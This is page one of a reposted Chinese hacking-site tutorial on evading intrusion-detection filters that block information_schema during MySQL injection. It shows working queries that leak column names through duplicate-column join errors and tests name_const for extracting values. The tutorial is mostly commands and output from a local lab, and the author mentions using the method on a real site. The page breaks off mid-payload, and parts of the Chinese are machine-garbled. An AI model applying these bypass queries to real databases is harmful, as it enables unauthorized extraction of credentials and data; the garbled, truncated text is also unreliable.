欢迎来到 黑吧安全网 聚焦网络安全前沿资讯,精华内容,交流技术心得!

绕过IDS过滤information_schema继续注入

来源:本站转载 作者:佚名 时间:2011-05-18 TAG: 我要投稿

 原文:绕过ids过滤information_schema接续灌注

 
//利用mysql出错爆出字段
 
mysql select*from(select*from user ajoin user b)c;
 
error 1060(42s21):duplicate column name'host'
 
mysql select*from(select*from user ajoin user busing(host))c;
 
error 1060(42s21):duplicate column name'user'
 
mysql select*from(select*from user ajoin user busing(host,user))c;
 
error 1060(42s21):duplicate column name'password'
 
.
 
//患上到信息
 
//有可能是版本问题,我测试没能成功
 
mysql select name_const((select host from user limit 0,1),0);
 
error 1210(hy000):incorrect arguments to name_const
 
仿佛是name_const的参数必须为const照旧怎么了,惨剧。
 
下次再好好测试一下。
 
update:明明是版本的问题(高版本要求参数全为const,不然报错),这方法的通用性看来不是大好。
 
mysql select version();
 
+---+
 
|version()|
 
+---+
 
|5.0.27-community-nt|
 
+---+
 
1 row in set(0.00 sec)
 
mysql select name_const((select user()),0);
 
+--+
 
|root@localhost|
 
+--+
 
|0|
 
+--+
 
1 row in set(0.00 sec)
 
---
 
mysql select version();
 
+--+
 
|version()|
 
+--+
 
|5.1.35-community|
 
+--+
 
1 row in set(0.00 sec)
 
mysql select name_const((select version()),0);
 
error 1210(hy000):incorrect arguments to name_const
 
本来做渗透的时候,遇到过一个站,ids过滤了information_schema,导致厥后我没有搞定,前日看文章,发现一个绕过的方法,本地测试了下,也以及月牛会商了下,最后在月牛的帮助下,把语句都构造好了,本来那个点,回去再看,也就搞定了,厥后被当哥把方法给放出来了,那就公布吧。
 
1.本地构造测试表
 
mysql create table users(id int,name varchar(20),passwd varchar(32));
 
query ok,0 rows affected(0.04 sec)
 
mysql insert into users value(1,'mickey','827ccb0eea8a706c4c34a16891f84e7b');
 
query ok,1 row affected(0.00 sec)
 
mysql create table news(is_admin int(1),id int⑵,title varchar(100),date date);
 
query ok,0 rows affected(0.00 sec)
 
mysql insert into news values(1,1,'hello,mickey',now());
 
query ok,1 row affected,1 warning(0.00 sec)
 
2.暴列名
 
mysql select*from(select*from users as ajoin news as b)as c;
 
error 1060(42s21):duplicate column name'id'
 
mysql select*from(select*from users ajoin users busing(id))c;
 
error 1060(42s21):duplicate column name'name'
 
mysql select*from(select*from users ajoin users busing(id,name))c;
 
error 1060(42s21):duplicate column name'passwd'
 
mysql select*from(select*from users ajoin users busing(id,name,passwd))c;
 
+--+--–+----+
 
|id|name|passwd|
 
+--+--–+----+
 
|1|mickey|827ccb0eea8a706c4c34a16891f84e7b|
 
+--+--–+----+
 
1 row in set(0.00 sec)
 
mysql select*from(select*from news ajoin news busing(id))as c;
 
error 1060(42s21):duplicate column name'is_admin'
 
mysql select*from(select*from news ajoin news busing(id,is_admin))as c;
 
error 1060(42s21):duplicate column name'title'
 
mysql select*from(select*from news ajoin news busing(id,is_admin,title))as c;
 
error 1060(42s21):duplicate column name'date'
 
mysql select*from(select*from news ajoin news busing(id,is_admin,title,date))as c;
 
+----+--+--–+--+
 
|is_admin|id|title|date|
 
+----+--+--–+--+
 
|1|1|hello,mickey|2010-05-08|
 
+----+--+--–+--+
 
1 row in set(0.00 sec)
 
3.暴字段值(这个语句是月牛想出来的)
 
研究出来的暴制语句
 
select*from cms_votes where vid=1 and exists

[1] [2]  下一页

【声明】:黑吧安全网(http://www.myhack58.com)登载此文出于传递更多信息之目的,并不代表本站赞同其观点和对其真实性负责,仅适于网络安全技术爱好者学习研究使用,学习中请遵循国家相关法律法规。如有问题请联系我们,联系邮箱admin@myhack58.com,我们会在最短的时间内进行处理。
  • 最新更新
    • 相关阅读
      • 本类热门
        • 最近下载